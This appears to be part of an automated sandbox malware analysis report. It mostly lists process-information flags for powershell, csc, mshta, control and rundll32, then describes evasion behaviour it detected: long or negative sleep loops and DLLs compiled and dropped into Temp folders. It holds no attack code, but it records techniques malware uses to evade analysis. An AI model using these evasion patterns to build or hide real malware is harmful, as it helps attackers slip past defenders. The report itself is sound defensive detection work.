Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084	Thread sleep time: -1773297476s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084	Thread sleep count: 799 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5772	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612	Thread sleep count: 6259 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676	Thread sleep count: 2927 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 6479 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704	Thread sleep count: 2798 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 452	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5152	Thread sleep time: -11990383647911201s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll	Jump to dropped file

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
